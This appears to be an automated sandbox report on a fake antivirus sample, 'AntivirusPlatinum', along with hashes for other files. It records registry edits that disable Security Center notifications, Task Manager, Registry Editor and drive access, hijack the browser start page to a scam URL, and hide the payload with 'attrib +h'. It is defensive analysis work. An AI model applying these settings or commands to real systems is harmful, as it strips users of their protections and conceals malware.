SHA1 05966b1b04e2e2f9e018d8b55f7b589d29d3ddbd
SHA256 3613e118d87531b4357b014f23a08551339962a3e0e5cfbdfbca7f989e145848
SHA512 6759bb36ebe8316bfbc17ca5fead431813a6aa2accecfa1391c041f8ac50e78ab1f88b5bfc5016fe4e337c32c73d97165d6431d63e84e072fac1a29c015f1872

\Nava Labs\Nava Shield\NavaBridge Libs\Browser Plugin.dll

MD5 912924f628e277be9cc28a5f2a990cb9
SHA1 13c0166469a271497043a2f13e9a6a610dc2b336
SHA256 bd474c5aafcaa12f20da5ecb29e17555b953eca46b4f56588a72672a36d4a8eb
SHA512 b33b430254f9ec32ecd6224124db69af93de3cbfbaf422a0045641f7961834a67cba1b9fd97f4e0e903e27e3360301c5dba214a6b9156c4cdf8a25115b860c39

memory/436-143-0x00000000002C0000-0x00000000002DA000-memory.dmp

C:\Nava Labs\Nava Shield\bridge.dat

MD5 e66f1107f995d52bcd90421b3cdc0dde
SHA1 245acafa2f3dab3f2b7f183d34267dcd976199c0
SHA256 45fa6eacea58e682c2ef2bb9e888cb6bf396c37b957fd144ca73c95699ad3c74
SHA512 0500f9dec5cfdfb80bc5763943deb3111ccde4b35f19ac124df2e5abde2681154977f160a42e9ef50698b0ea0cc26fc09361a3917534038f141dd047f0287c1f

\Nava Labs\Nava Shield\NavaDebugger.exe

MD5 25873e5d9d605d2e0937420b404b22b6
SHA1 618a56b176c2edf76c2bfb8295dcf1fb35ef2cc8
SHA256 1c23dfea6df21feb5d18b2914f961385608d63fd709209b57cbd701896ad9bb2
SHA512 9680c68d1ae95663bc4c137aa4e75514322607132cb7cbccd7ddbf0fcb44a77699f0764b811b7401185c73f7b495a6eed7eb26d70c8b3af072914f125b66e41a

C:\Nava Labs\Nava Shield\NavaDebugger.exe

MD5 9111d2f189927c7b49f49d3e2068cb68
SHA1 ccb60935e474978efd8e7737d660f77be7720366
SHA256 8ede8bbfdd719b86bf6c949412b86ef7ba7573596772a8f506e74c2c04ce430b
SHA512 3364416cdb9c7f276e1dd167b1cacf3ec964aac24c3cb1cd160a4e64435ccaed4331486be5c55172f83c2eab5b25ebb05816ada7f81085c68fa3eeee3306f4aa

memory/1560-149-0x0000000002460000-0x00000000025E7000-memory.dmp

C:\Nava Labs\Nava Shield\navig.dat

MD5 0bf850cb9d0aa0f4c778cc515b79bd13
SHA1 c0cb8a58cba046d2c7539025a39c8a1af81c3914
SHA256 9c4723ecb77e39e58eda9c60f532724aa3bf69de30047cc7b6522534cd423f00
SHA512 649c13f9f4fccc03ebd6cb2c3752434c69b5a8d7e9b94cac80cd98a7624bfd00648949b18cd720faf89fae050f6b523221db589a550c6ce4513e76ff0895da5b

memory/436-140-0x0000000000290000-0x00000000002A2000-memory.dmp

memory/436-135-0x00000000025A0000-0x000000000272B000-memory.dmp

\Nava Labs\Nava Shield\NavaBridge.exe

MD5 beb9a1306c8001258b9df8c7a9c816ff
SHA1 63ac7fe58e9eedecdc35f2e12d3c263717b18d19
SHA256 d39c80e19ddaf2c1d8e2e10136c475778358c389d0caba91eab599efbf0c58ae
SHA512 0d4b9ec262993a19260386432acf9fc61819f2cf54e636abb392ac59427d02d4285b0a3c14b773ac709dbfffcb145588a83e9deb154ef52f33c709190bfb7e79

memory/2012-151-0x0000000069F80000-0x0000000069F88000-memory.dmp

C:\Nava Labs\Nava Shield\config.dat

MD5 059404ab16e140325da96b8cf871eb0f
SHA1 a042d03a013ccea427fa9d776801efd54b2862d8
SHA256 6150381c68bdf45a6ce9cf13135dce19886ffd0c252d4b8a0a2ef6d5a983eb47
SHA512 fe1472d39f13228c5734a2ab29ba343571cf67df5dc844a1b828806649a6b734d226484e408d0376140670641950d257f0cdf617efbbec39043509088d250874

Analysis: behavioral9

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

144s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe"

Signatures

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" \??\c:\windows\antivirus-platinum.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\WINDOWS\302746537.exe N/A
N/A N/A \??\c:\windows\antivirus-platinum.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\MSCOMCTL.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\MSCOMCTL.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\302746537.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File created C:\Windows\__tmp_rar_sfx_access_check_259414483 C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\COMCTL32.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File created C:\Windows\COMCTL32.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File created C:\Windows\302746537.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\windows\antivirus-platinum.exe C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\antivirus-platinum.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\antivirus-platinum.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main\Window Title = "YOUR PC MAY BE INFECTED WITH SPYWARE OR OTHER MALICIOUS ITEMS" \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main \??\c:\windows\antivirus-platinum.exe N/A

Modifies Internet Explorer start page

stealer
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\Start Page = "http://secureservices2010.webs.com/scan" \??\c:\windows\antivirus-platinum.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" \??\c:\windows\antivirus-platinum.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0713E8A2-850A-101B-AFC0-4210102A8DA7}\MiscStatus\1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2334D2B3-713E-11CF-8AE5-00AA00C00905}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D8C-9D6A-101B-AFC0-4210102A8DA7} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C27CCE3A-8596-11D1-B16A-00C0F0283628}\ = "Panel Property Page Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.TreeCtrl\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F049-858B-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C247F26-8591-11D1-B16A-00C0F0283628}\ = "IImage" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0713E8A2-850A-101B-AFC0-4210102A8DA7}\Control C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.Toolbar.1\CLSID\ = "{612A8624-0FB3-11CE-8747-524153480004}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{612A8626-0FB3-11CE-8747-524153480004}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6B7E6391-850A-101B-AFC0-4210102A8DA7}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E86-DF38-11CF-8E74-00A0C90F26F8}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E6E17E8E-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD9DA664-8594-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6B7E6392-850A-101B-AFC0-4210102A8DA7}\1.3\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F08DF952-8592-11D1-B16A-00C0F0283628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C8A3DC00-8593-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7}\ = "Microsoft ImageList Control, version 5.0 (SP2)" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA40-E020-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83601-895E-11D0-B0A6-000000000000}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D8B-9D6A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{373FF7F1-EB8B-11CD-8820-08002B2F4F5A}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8E3867A3-8586-11D1-B16A-00C0F0283628}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD9DA666-8594-11D1-B16A-00C0F0283628}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F04A-858B-11D1-B16A-00C0F0283628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F08DF953-8592-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{35053A22-8589-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA52-E020-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DA8D90-9D6A-101B-AFC0-4210102A8DA7}\ = "IImageList10" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628}\Version\ = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{612A8625-0FB3-11CE-8747-524153480004} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F4D83602-895E-11D0-B0A6-000000000000}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1EFB6594-857C-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C27CCE35-8596-11D1-B16A-00C0F0283628}\InprocServer32\ = "c:\\windows\\mscomctl.ocx" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66833FE9-8583-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{58DA8D8A-9D6A-101B-AFC0-4210102A8DA7}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{58DA8D96-9D6A-101B-AFC0-4210102A8DA7}\InprocServer32\ = "c:\\windows\\comctl32.ocx" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0713E8AF-850A-101B-AFC0-4210102A8DA7}\ = "IListItem10" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8556BCD0-E01E-11CF-8E74-00A0C90F26F8} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C27CCE38-8596-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E80-DF38-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E6E17E82-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8E3867A3-8586-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66833FE5-8583-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA62-E020-11CF-8E74-00A0C90F26F8}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F04A-858B-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.ListViewCtrl\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BF877892-E026-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8556BCD2-E01E-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E6E17E8C-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0713E8D0-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83600-895E-11D0-B0A6-000000000000}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{35053A22-8589-11D1-B16A-00C0F0283628}\MiscStatus C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8E3867AA-8586-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9ED94444-E5E8-101B-B9B5-444553540000} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6B7E63A3-850A-101B-AFC0-4210102A8DA7}\ = "Panel Property Page Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{612A8626-0FB3-11CE-8747-524153480004}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{7791BA62-E020-11CF-8E74-00A0C90F26F8}\ = "INode" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352} C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A \??\c:\windows\antivirus-platinum.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2492 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 2492 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 2492 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 2492 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 2492 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 2492 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 2492 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 2616 wrote to memory of 2416 N/A C:\WINDOWS\302746537.exe C:\Windows\SysWOW64\cmd.exe
PID 2616 wrote to memory of 2416 N/A C:\WINDOWS\302746537.exe C:\Windows\SysWOW64\cmd.exe
PID 2616 wrote to memory of 2416 N/A C:\WINDOWS\302746537.exe C:\Windows\SysWOW64\cmd.exe
PID 2616 wrote to memory of 2416 N/A C:\WINDOWS\302746537.exe C:\Windows\SysWOW64\cmd.exe
PID 2416 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\antivirus-platinum.exe
PID 2416 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\antivirus-platinum.exe
PID 2416 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\antivirus-platinum.exe
PID 2416 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\antivirus-platinum.exe
PID 2416 wrote to memory of 1948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2416 wrote to memory of 1948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2416 wrote to memory of 1948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2416 wrote to memory of 1948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "67108863" \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" \??\c:\windows\antivirus-platinum.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe"

C:\WINDOWS\302746537.exe

"C:\WINDOWS\302746537.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\5AFC.tmp\302746537.bat" "

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\comctl32.ocx

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\mscomctl.ocx

\??\c:\windows\antivirus-platinum.exe

c:\windows\antivirus-platinum.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h c:\windows\antivirus-platinum.exe

Network

N/A

Files

memory/2492-10-0x0000000001D90000-0x0000000001D96000-memory.dmp

C:\Windows\302746537.exe

MD5 8703ff2e53c6fd3bc91294ef9204baca
SHA1 3dbb8f7f5dfe6b235486ab867a2844b1c2143733
SHA256 3028a2b0e95143a4caa9bcd6ae794958e7469a20c6e673da067958cbf4310035
SHA512 d5eb8a07457a78f9acd0f81d2f58bbf64b52183318b87c353a590cd2a3ac3a6ec9c1452bd52306c7cf99f19b6a897b16ceb8289a7d008c5ce3b07eda9b871204

memory/2492-14-0x00000000031C0000-0x00000000031D0000-memory.dmp

memory/2616-17-0x0000000000400000-0x0000000000410000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5AFC.tmp\302746537.bat

MD5 7d8beb22dfcfacbbc2609f88a41c1458
SHA1 52ec2b10489736b963d39a9f84b66bafbf15685f
SHA256 4aa9ed4b38514f117e6e4f326cb0a1be7f7b96199e21305e2bd6dce289d7baa2
SHA512 a26cf9168cf7450435a9fe8942445511f6fda1087db52bd73e335d6f5b544fc892999019d9291d9dcc60c3656de49688f6d63282c97706e2db286f988e44fd94

\??\c:\windows\comctl32.ocx

MD5 821511549e2aaf29889c7b812674d59b
SHA1 3b2fd80f634a3d62277e0508bedca9aae0c5a0d6
SHA256 f59cdf89f0f522ce3662e09fa847bca9b277b006c415dcc0029b416c347db9c4
SHA512 8b2e805b916e5fbfcccb0f4189372aea006789b3847b51018075187135e9b5db9098f704c1932623f356db0ee327e1539a9bf3729947e92844a26db46555e8cd

\??\c:\windows\mscomctl.ocx

MD5 714cf24fc19a20ae0dc701b48ded2cf6
SHA1 d904d2fa7639c38ffb6e69f1ef779ca1001b8c18
